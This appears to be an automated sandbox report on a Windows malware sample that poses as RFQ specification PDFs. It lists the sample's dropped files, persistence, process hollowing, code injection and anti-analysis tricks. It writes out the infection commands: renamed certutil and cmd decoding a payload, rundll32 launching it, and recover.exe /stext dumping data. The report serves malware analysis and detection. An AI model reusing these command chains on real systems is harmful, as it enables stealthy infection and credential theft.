Source: C:\Users\Public\expha.pif File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\rdha.pif Jump to dropped file
Source: C:\Users\Public\ghf.pif File created: C:\Users\Public\ANYDESK.PIF Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\expha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\ghf.pif Jump to dropped file
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 62_2_0041AC43
Source: C:\Users\Public\ANYDESK.PIF Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kaitdipg Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kaitdipg Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B164E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 26_2_02B164E4
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\ANYDESK.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 47_2_0040BAE3
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 62_2_0041A941
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 62_2_0684B7CF
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 3.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2532 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B052F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 26_2_02B052F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_053610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 35_2_053610F1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05366580 FindFirstFileExA, 35_2_05366580
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0040B477 FindFirstFileW,FindNextFileW, 47_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 49_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 53_2_00407898
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 62_2_004090DC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 62_2_0040B6B5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 62_2_0041C7E5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 62_2_0040B8BA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0044E989 FindFirstFileExA, 62_2_0044E989
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 62_2_00408CDE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 62_2_00419CEE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 62_2_00407EDD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00406F13 FindFirstFileW,FindNextFileW, 62_2_00406F13
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684D673 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 62_2_0684D673
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0683C543 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 62_2_0683C543
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06839F6A __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 62_2_06839F6A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06837DA1 FindFirstFileW,FindNextFileW, 62_2_06837DA1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06838D6B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 62_2_06838D6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684AB7C FindFirstFileW, 62_2_0684AB7C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0687F817 FindFirstFileExA, 62_2_0687F817
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 62_2_00407357
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0041A8D8 memset,GetSystemInfo, 47_2_0041A8D8
Source: colorcpl.exe, 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2078794382.00000000031E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhv3B03.tmp.47.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031E2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?
Source: ANYDESK.PIF, 0000001A.00000002.1843896741.000000000097E000.00000004.00000020.00020000.00000000.sdmp, ANYDESK.PIF, 0000003C.00000002.2143083880.00000000006E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\ANYDESK.PIF API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\recover.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\ANYDESK.PIF API call chain: ExitProcess graph end node
Source: C:\Users\Public\ANYDESK.PIF Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 26_2_02B1A5B0
Checks if the current process is being debugged
Source: C:\Users\Public\ANYDESK.PIF Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_053660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_053660E2
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 47_2_0040BAE3
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 26_2_02B13E20
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05364AB4 mov eax, dword ptr fs:[00000030h] 35_2_05364AB4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004438F4 mov eax, dword ptr fs:[00000030h] 62_2_004438F4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06831143 mov eax, dword ptr fs:[00000030h] 62_2_06831143
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06831143 mov eax, dword ptr fs:[00000030h] 62_2_06831143
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06874782 mov eax, dword ptr fs:[00000030h] 62_2_06874782
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_0536724E GetProcessHeap, 35_2_0536724E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_053660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_053660E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05362B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_05362B1C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05362639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_05362639
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 62_2_00435398
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 62_2_0043B88D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 62_2_00434D6E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00434F01 SetUnhandledExceptionFilter, 62_2_00434F01
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0686C71B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 62_2_0686C71B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06866226 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 62_2_06866226
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06865BFC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 62_2_06865BFC

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\Public\ANYDESK.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 7120000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 6830000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Users\Public\ANYDESK.PIF Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 71215F6 Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 68315F6
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\ghf.pif Jump to dropped file
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\alpha.pif Jump to dropped file
Injects a PE file into a foreign processes
Source: C:\Users\Public\ANYDESK.PIF Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 7120000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Memory written: C:\Windows\SysWOW64\SndVol.exe base: 6830000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\Public\ANYDESK.PIF Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 7120000 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Windows\SysWOW64\recover.exe base: 78F008 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Windows\SysWOW64\recover.exe base: 2AE0008 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Windows\SysWOW64\recover.exe base: 2A34008 Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Memory written: C:\Windows\SysWOW64\SndVol.exe base: 6830000
Contains functionality to simulate mouse events
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004197D9 mouse_event, 62_2_004197D9
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Users\Public\rdha.pif Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Users\Public\rdha.pif Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05362933 cpuid 35_2_05362933
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\ANYDESK.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 26_2_02B054BC
Source: C:\Users\Public\ANYDESK.PIF Code function: GetLocaleInfoA, 26_2_02B0A0B8
Source: C:\Users\Public\ANYDESK.PIF Code function: GetLocaleInfoA, 26_2_02B0A104
Source: C:\Users\Public\ANYDESK.PIF Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 26_2_02B055C8
Source: C:\Users\Public\ANYDESK.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 60_2_02A254BC
Source: C:\Users\Public\ANYDESK.PIF Code function: GetLocaleInfoA, 60_2_02A2A104
Source: C:\Users\Public\ANYDESK.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 60_2_02A255C7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_004520E2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_00452097
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_0045217D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 62_2_0040F26B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 62_2_0045220A
